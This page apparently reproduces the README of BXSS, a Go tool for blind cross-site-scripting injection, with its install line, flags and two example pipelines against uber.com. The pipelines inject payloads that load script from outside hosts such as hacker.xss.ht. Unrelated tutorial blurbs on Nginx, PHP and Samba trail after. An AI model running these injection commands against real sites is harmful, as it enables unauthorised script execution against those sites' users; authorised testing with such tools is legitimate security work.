BXSS is a blind XSS injector tool.
Features
Install
$ go get -u github.com/ethicalhackingplayground/bxss
Arguments
— Coded by @z0idsec —
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default “User-Agent”)
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters
$ subfinder uber.com | gau | bxss -payload ‘”><script src=https://z0id.xss.ht></script>’ -header “X-Forwarded-For”
Nginx (pronounced "engine x") is a free, open-source, high-performance HTTP server and reverse proxy. It handles…
Nginx (pronounced "engine x") is a free, open-source, high-performance HTTP server and reverse proxy. It handles…
Let's Encrypt is a free, automated, and open certificate authority run by the Internet Security Research…
PHP is the most widely used server-side scripting language for web development. Ubuntu 18.04 ships with PHP…
Skype is one of the most widely used communication platforms in the world. It lets you…
Samba is a free, open-source implementation of the SMB/CIFS network protocol that lets Linux servers share…